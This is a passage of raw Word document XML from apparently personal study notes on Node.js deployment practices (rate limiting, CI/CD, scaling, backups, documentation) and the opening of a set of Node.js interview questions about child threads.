        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rate Limiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement rate limiting to protect your application from abuse and denial-of-service attacks. Libraries like express-rate-limit can help with this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C08A01" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Automate Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7B365B" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Continuous Integration/Continuous Deployment (CI/CD)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use CI/CD pipelines to automate testing and deployment processes. Tools like Jenkins, GitHub Actions, or GitLab CI/CD can help streamline deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE133C7" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Infrastructure as Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use tools like Terraform or Ansible to manage and provision your infrastructure in a repeatable and automated manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C105E" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7. Scalability and Maintenance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445CAD08" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Horizontal Scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Deploy multiple instances of your application and distribute traffic using load balancers to scale horizontally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3266DF4D" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Vertical Scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Increase the resources (CPU, memory) of your server if needed, but avoid relying solely on vertical scaling for long-term scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F916D2F" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Health Checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement health checks to monitor the status of your application and automatically restart instances if they become unhealthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7916603D" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Backup and Recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regularly back up your databases and application data. Implement disaster recovery plans to ensure that you can recover from data loss or outages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A76FEE4" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8. Documentation and Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721D5F0B" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Document your deployment processes, configuration settings, and any dependencies. This helps ensure that others can understand and maintain the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD4309D" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Support and Maintenance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Establish a support and maintenance plan for your application, including regular updates, bug fixes, and performance tuning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4659EE8C" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03213FEA" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Process Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use tools like PM2 to manage and monitor your Node.js application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9D9953" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement robust error handling and monitor uncaught exceptions and rejections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120FCA2B" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance Optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Employ caching, load balancing, and asset minification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CB82E8" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Serve over HTTPS, validate inputs, and secure sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5469A2FF" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Automation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use CI/CD pipelines and infrastructure as code for efficient deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739EEAA0" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>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 Implement horizontal and vertical scaling strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329BF2BD" w14:textId="77777777" w:rsidR="001C3DB3" w:rsidRPr="00DA2F32" w:rsidRDefault="001C3DB3" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Maintain thorough documentation and support plans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE7C1C4" w14:textId="3F0175AA" w:rsidR="0029395F" w:rsidRPr="00DA2F32" w:rsidRDefault="0029395F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55014ACF" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D92763" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc178383236"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Toptal NodeJS Questions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="38BBD06D" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D92763" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc178383237"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How does Node.js handle child threads?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="2CC51854" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D92763" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js, in its essence, is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>single thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> process. It does not expose child threads and thread management methods to the developer. Technically, Node.js </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>does</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> spawn child threads for certain tasks such as asynchronous I/O, but these run behind the scenes and do not execute any application JavaScript code, nor block the main event loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204307FD" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D92763" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If threading support is desired in a Node.js application, there are tools available to enable it, such as the </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00DA2F32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>ChildProcess</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> module. In fact, </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00DA2F32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>Node.js 12 has experimental support for threads</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7159B364" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D92763" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7C67F8" w14:textId="77777777" w:rsidR="00D92763" w:rsidRPr="00DA2F32" w:rsidRDefault="00D92763" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
